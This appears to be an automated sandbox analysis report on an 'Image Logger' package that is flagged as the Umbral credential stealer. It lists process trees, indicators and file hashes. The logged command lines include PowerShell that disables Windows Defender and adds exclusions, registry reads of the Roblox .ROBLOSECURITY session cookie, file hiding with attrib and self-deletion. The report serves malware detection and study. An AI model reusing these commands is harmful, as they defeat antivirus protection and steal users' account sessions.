Overview
overview
10Static
static
10Image Logg...up.bat
windows7-x64
10Image Logg...up.bat
windows10-2004-x64
10Image Logg...px.exe
windows7-x64
10Image Logg...px.exe
windows10-2004-x64
10Image Logg...in.exe
windows7-x64
7Image Logg...in.exe
windows10-2004-x64
7main.pyc
windows7-x64
3main.pyc
windows10-2004-x64
3Image Logg...rt.bat
windows7-x64
10Image Logg...rt.bat
windows10-2004-x64
10Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 20:28
Behavioral task
behavioral1
Sample
Image Logger/Setup.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Image Logger/Setup.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Image Logger/Src/Files/upx.exe
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Image Logger/Src/Files/upx.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Image Logger/Src/main.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
Image Logger/Src/main.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
main.pyc
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
main.pyc
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Image Logger/Start.bat
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
Image Logger/Start.bat
Resource
win10v2004-20240802-en
General
-
Target
Image Logger/Start.bat
-
Size
59B
-
MD5
f43a646ca2cde87cc20f3756ad12e51c
-
SHA1
2788e5da1348b7418356d2a485a40c7fb4697588
-
SHA256
3ea2dd9cdd54135aaf47b196acbd4b54be5744be4fdfa022600e2cdd1cdf7d0c
-
SHA512
3788d856a36cba78b147dfc4263682105cd4ddf6f6db701b4cbe95a4b449d397ff5d5f039a93dd77f055bb6db329f908796fb3ff0969a8070647ffc1c13fe7cb
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral9/memory/1988-37-0x0000000000AE0000-0x0000000000B20000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2192 powershell.exe 1968 powershell.exe 960 powershell.exe 572 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts upx.exe -
Loads dropped DLL 7 IoCs
pid Process 2728 main.exe 2728 main.exe 2728 main.exe 2728 main.exe 2728 main.exe 2728 main.exe 2728 main.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 9 discord.com 10 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2636 cmd.exe 2924 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 332 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2924 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1988 upx.exe 2192 powershell.exe 1968 powershell.exe 960 powershell.exe 1960 powershell.exe 572 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1988 upx.exe Token: SeIncreaseQuotaPrivilege 1256 wmic.exe Token: SeSecurityPrivilege 1256 wmic.exe Token: SeTakeOwnershipPrivilege 1256 wmic.exe Token: SeLoadDriverPrivilege 1256 wmic.exe Token: SeSystemProfilePrivilege 1256 wmic.exe Token: SeSystemtimePrivilege 1256 wmic.exe Token: SeProfSingleProcessPrivilege 1256 wmic.exe Token: SeIncBasePriorityPrivilege 1256 wmic.exe Token: SeCreatePagefilePrivilege 1256 wmic.exe Token: SeBackupPrivilege 1256 wmic.exe Token: SeRestorePrivilege 1256 wmic.exe Token: SeShutdownPrivilege 1256 wmic.exe Token: SeDebugPrivilege 1256 wmic.exe Token: SeSystemEnvironmentPrivilege 1256 wmic.exe Token: SeRemoteShutdownPrivilege 1256 wmic.exe Token: SeUndockPrivilege 1256 wmic.exe Token: SeManageVolumePrivilege 1256 wmic.exe Token: 33 1256 wmic.exe Token: 34 1256 wmic.exe Token: 35 1256 wmic.exe Token: SeIncreaseQuotaPrivilege 1256 wmic.exe Token: SeSecurityPrivilege 1256 wmic.exe Token: SeTakeOwnershipPrivilege 1256 wmic.exe Token: SeLoadDriverPrivilege 1256 wmic.exe Token: SeSystemProfilePrivilege 1256 wmic.exe Token: SeSystemtimePrivilege 1256 wmic.exe Token: SeProfSingleProcessPrivilege 1256 wmic.exe Token: SeIncBasePriorityPrivilege 1256 wmic.exe Token: SeCreatePagefilePrivilege 1256 wmic.exe Token: SeBackupPrivilege 1256 wmic.exe Token: SeRestorePrivilege 1256 wmic.exe Token: SeShutdownPrivilege 1256 wmic.exe Token: SeDebugPrivilege 1256 wmic.exe Token: SeSystemEnvironmentPrivilege 1256 wmic.exe Token: SeRemoteShutdownPrivilege 1256 wmic.exe Token: SeUndockPrivilege 1256 wmic.exe Token: SeManageVolumePrivilege 1256 wmic.exe Token: 33 1256 wmic.exe Token: 34 1256 wmic.exe Token: 35 1256 wmic.exe Token: SeDebugPrivilege 2192 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeDebugPrivilege 960 powershell.exe Token: SeDebugPrivilege 1960 powershell.exe Token: SeIncreaseQuotaPrivilege 344 wmic.exe Token: SeSecurityPrivilege 344 wmic.exe Token: SeTakeOwnershipPrivilege 344 wmic.exe Token: SeLoadDriverPrivilege 344 wmic.exe Token: SeSystemProfilePrivilege 344 wmic.exe Token: SeSystemtimePrivilege 344 wmic.exe Token: SeProfSingleProcessPrivilege 344 wmic.exe Token: SeIncBasePriorityPrivilege 344 wmic.exe Token: SeCreatePagefilePrivilege 344 wmic.exe Token: SeBackupPrivilege 344 wmic.exe Token: SeRestorePrivilege 344 wmic.exe Token: SeShutdownPrivilege 344 wmic.exe Token: SeDebugPrivilege 344 wmic.exe Token: SeSystemEnvironmentPrivilege 344 wmic.exe Token: SeRemoteShutdownPrivilege 344 wmic.exe Token: SeUndockPrivilege 344 wmic.exe Token: SeManageVolumePrivilege 344 wmic.exe Token: 33 344 wmic.exe Token: 34 344 wmic.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2512 wrote to memory of 2104 2512 cmd.exe 32 PID 2512 wrote to memory of 2104 2512 cmd.exe 32 PID 2512 wrote to memory of 2104 2512 cmd.exe 32 PID 2512 wrote to memory of 1988 2512 cmd.exe 34 PID 2512 wrote to memory of 1988 2512 cmd.exe 34 PID 2512 wrote to memory of 1988 2512 cmd.exe 34 PID 2104 wrote to memory of 2728 2104 main.exe 35 PID 2104 wrote to memory of 2728 2104 main.exe 35 PID 2104 wrote to memory of 2728 2104 main.exe 35 PID 1988 wrote to memory of 1256 1988 upx.exe 36 PID 1988 wrote to memory of 1256 1988 upx.exe 36 PID 1988 wrote to memory of 1256 1988 upx.exe 36 PID 1988 wrote to memory of 1880 1988 upx.exe 39 PID 1988 wrote to memory of 1880 1988 upx.exe 39 PID 1988 wrote to memory of 1880 1988 upx.exe 39 PID 1988 wrote to memory of 2192 1988 upx.exe 41 PID 1988 wrote to memory of 2192 1988 upx.exe 41 PID 1988 wrote to memory of 2192 1988 upx.exe 41 PID 1988 wrote to memory of 1968 1988 upx.exe 43 PID 1988 wrote to memory of 1968 1988 upx.exe 43 PID 1988 wrote to memory of 1968 1988 upx.exe 43 PID 1988 wrote to memory of 960 1988 upx.exe 45 PID 1988 wrote to memory of 960 1988 upx.exe 45 PID 1988 wrote to memory of 960 1988 upx.exe 45 PID 1988 wrote to memory of 1960 1988 upx.exe 47 PID 1988 wrote to memory of 1960 1988 upx.exe 47 PID 1988 wrote to memory of 1960 1988 upx.exe 47 PID 1988 wrote to memory of 344 1988 upx.exe 49 PID 1988 wrote to memory of 344 1988 upx.exe 49 PID 1988 wrote to memory of 344 1988 upx.exe 49 PID 1988 wrote to memory of 2448 1988 upx.exe 51 PID 1988 wrote to memory of 2448 1988 upx.exe 51 PID 1988 wrote to memory of 2448 1988 upx.exe 51 PID 1988 wrote to memory of 304 1988 upx.exe 53 PID 1988 wrote to memory of 304 1988 upx.exe 53 PID 1988 wrote to memory of 304 1988 upx.exe 53 PID 1988 wrote to memory of 572 1988 upx.exe 55 PID 1988 wrote to memory of 572 1988 upx.exe 55 PID 1988 wrote to memory of 572 1988 upx.exe 55 PID 1988 wrote to memory of 332 1988 upx.exe 57 PID 1988 wrote to memory of 332 1988 upx.exe 57 PID 1988 wrote to memory of 332 1988 upx.exe 57 PID 1988 wrote to memory of 2636 1988 upx.exe 59 PID 1988 wrote to memory of 2636 1988 upx.exe 59 PID 1988 wrote to memory of 2636 1988 upx.exe 59 PID 2636 wrote to memory of 2924 2636 cmd.exe 61 PID 2636 wrote to memory of 2924 2636 cmd.exe 61 PID 2636 wrote to memory of 2924 2636 cmd.exe 61 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1880 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Image Logger\Start.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\main.exeSrc/main.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\main.exeSrc/main.exe3⤵
- Loads dropped DLL
PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exeSrc/Files/upx.exe2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1256
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe"3⤵
- Views/modifies file attributes
PID:1880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2448
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:572
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:332
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Image Logger\Src\Files\upx.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2924
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
21KB
MD51c58526d681efe507deb8f1935c75487
SHA10e6d328faf3563f2aae029bc5f2272fb7a742672
SHA256ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2
SHA5128edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1
-
Filesize
21KB
MD5724223109e49cb01d61d63a8be926b8f
SHA1072a4d01e01dbbab7281d9bd3add76f9a3c8b23b
SHA2564e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210
SHA51219b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c
-
Filesize
21KB
MD5d12403ee11359259ba2b0706e5e5111c
SHA103cc7827a30fd1dee38665c0cc993b4b533ac138
SHA256f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781
SHA5129004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0
-
Filesize
6.7MB
MD5550288a078dffc3430c08da888e70810
SHA101b1d31f37fb3fd81d893cc5e4a258e976f5884f
SHA256789a42ac160cef98f8925cb347473eeeb4e70f5513242e7faba5139ba06edf2d
SHA5127244432fc3716f7ef27630d4e8fbc8180a2542aa97a01d44dca260ab43966dd8ac98b6023400b0478a4809aace1a128f1f4d6e544f2e591a5b436fd4c8a9d723
-
Filesize
992KB
MD50e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA14189f4459c54e69c6d3155a82524bda7549a75a6
SHA2568a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5caf596ba20da659ce77255a98a439362
SHA11975d11145f62c3f74673b6d2ec6b8667dfd5e67
SHA25699e7ca10aa7f26e7fc6ada31234e3a99510575ba2388be01d53b6c789447d6a4
SHA5127a9f1aca5a48969d06dabdc016d858d93f8e6765d6d3b887708dfc6fcb950c0ccb982cc3aceec70375c286860de6000e9831ef9499c41628960d5ceeafad3a16
-
Filesize
18KB
MD5bfffa7117fd9b1622c66d949bac3f1d7
SHA1402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA2561ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f
-
Filesize
21KB
MD5517eb9e2cb671ae49f99173d7f7ce43f
SHA14ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab
SHA25657cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54
SHA512492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be